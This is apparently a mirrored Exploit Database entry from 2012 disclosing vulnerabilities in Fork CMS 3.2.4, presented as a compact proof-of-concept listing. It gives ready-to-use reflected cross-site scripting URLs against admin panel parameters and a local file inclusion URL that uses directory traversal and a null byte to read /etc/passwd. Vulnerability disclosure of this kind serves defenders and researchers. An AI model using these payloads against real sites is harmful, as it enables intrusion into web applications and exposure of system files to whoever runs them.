Fork CMS 3.2.4 – Local File Inclusion / Cross-Site Scripting

• Exploit Database
• 120 阅读

• 作者： Avram Marius
  日期： 2012-02-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18483/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  ##########################################################################################################################   #Exploit Title: Fork CMS v.3.2.4- Multiple Vulnerabilities   #Script Page : http://www.fork-cms.com #Date: 11-02-2012   #Author : RandomStorm- http://www.randomstorm.com   #Avram Marius Gabriel (d3v1l)   #Tested on: Windows XP & Vista ########################################################################################################################## #Reflected Cross-Site Scripting (XSS) on Admin Panel   #POC:   #http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script>   #http://site.com/users/index?token=true&error=</script><script>alert(1)</script> ###########################################################################################################################   #Local File Inclusion ( LFI )   #POC:   #http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en     ########################################################################################################################## # About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.   ###########################################################################################################################